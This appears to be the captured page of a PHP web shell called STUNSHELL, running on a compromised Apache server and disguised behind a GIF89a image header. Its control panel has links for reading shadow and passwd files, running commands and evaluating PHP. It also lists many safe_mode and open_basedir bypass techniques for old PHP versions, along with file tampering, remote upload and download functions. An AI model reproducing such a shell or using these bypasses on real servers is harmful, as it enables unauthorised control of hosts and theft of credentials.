GIF89a???????????!??????,???????D?;? [ STUNSHELL #unknown @ ByroeNet ]
  N  2009   31-01-2012 10:27:01 Your IP: [] Server IP: []
  PHP version: 5.1.6  cURL: ON  MySQL: ON  MSSQL: OFF  PostgreSQL: OFF  Oracle: OFF
  Free space : 35.11 GB Total space: 50 GB
  [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ syslog ]  [ resolv ]  [ hosts ]  [ shadow ]  [ passwd ]  [ tmp ]  [ delete ]
uname -a : 
sysctl : 
Server : 
id : 
pwd : 

   Apache/2.2.3 (Fedora)
   /var/www/vhosts/   ( u--------- )
Jalankan Perintah: safe_dir
:: Work in safe_mode ::
Direktory kerja 4     
:: Edit files ::
File for edit 4     
:: Create/Delete File/Dir ::
name 4            
:: Modify/Access date(touch) ::
:: Chown/Chgrp/Chmod ::
:: Cari text di file ::
:: Eval kode PHP ::
:: Test bypass safe_mode with include function ::
:: Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4) ::
Cat file 4     
:: Test bypass safe_mode with load file in mysql ::
Database . Table 4     Login 4    Password 4    Port 4
Cat file 4     
:: Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x) ::
Cat file 4     
:: Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2) ::
Direktory kerja 4     
:: Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2) ::
Cat file 4     
:: Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2) ::
Copy from 4
to 4     
:: Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST ::
Cat file 4     
:: Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x) ::
Direktory kerja 4     
:: Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1) ::
:: Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1) ::
:: Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2) ::
:: Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0) ::
:: Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4) ::
:: Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0) ::
:: Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1) ::
Cat file 4
:: Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1) ::
Direktory kerja 4
:: Upload file ke server ::
Local file 4
 Nama Baru 4     
:: Multy Upload file ke server ::
:: Upload file dari remote server ::
With 4   Remote file 4
Local file 4     
:: Download files dari server ::
file 4     
Archivation 4 without arch. zip gzip bzip
:: FTP ::